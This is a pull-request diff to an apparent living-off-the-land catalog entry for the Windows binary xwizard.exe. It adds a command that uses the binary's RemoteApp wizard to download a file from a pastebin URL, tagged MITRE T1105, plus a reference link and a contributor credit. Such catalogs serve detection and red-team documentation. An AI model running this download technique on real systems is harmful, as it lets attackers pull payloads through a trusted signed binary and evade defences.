Merge pull request #92 from whickey-r7/patch-1

Update Xwizard.yml

yml/OSBinaries/Xwizard.yml

@@ -20,6 +20,14 @@ Commands:
     MitreID: T1218
     MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+  - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
+    Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file.
+    Usecase: Download file from Internet
+    Category: Download
+    Privileges: User
+    MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
+    OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\xwizard.exe
   - Path: C:\Windows\SysWOW64\xwizard.exe
@@ -32,6 +40,7 @@ Resources:
   - Link: https://www.youtube.com/watch?v=LwDHX7DVHWU
   - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
   - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
+  - Link: https://twitter.com/notwhickey/status/1306023056847110144
 Acknowledgement:
   - Person: Adam
     Handle: '@Hexacorn'
@@ -39,4 +48,6 @@ Acknowledgement:
     Handle: '@NickTyrer'
   - Person: harr0ey
     Handle: '@harr0ey'
+  - Person: Wade Hickey
+    Handle: '@notwhickey'
 ---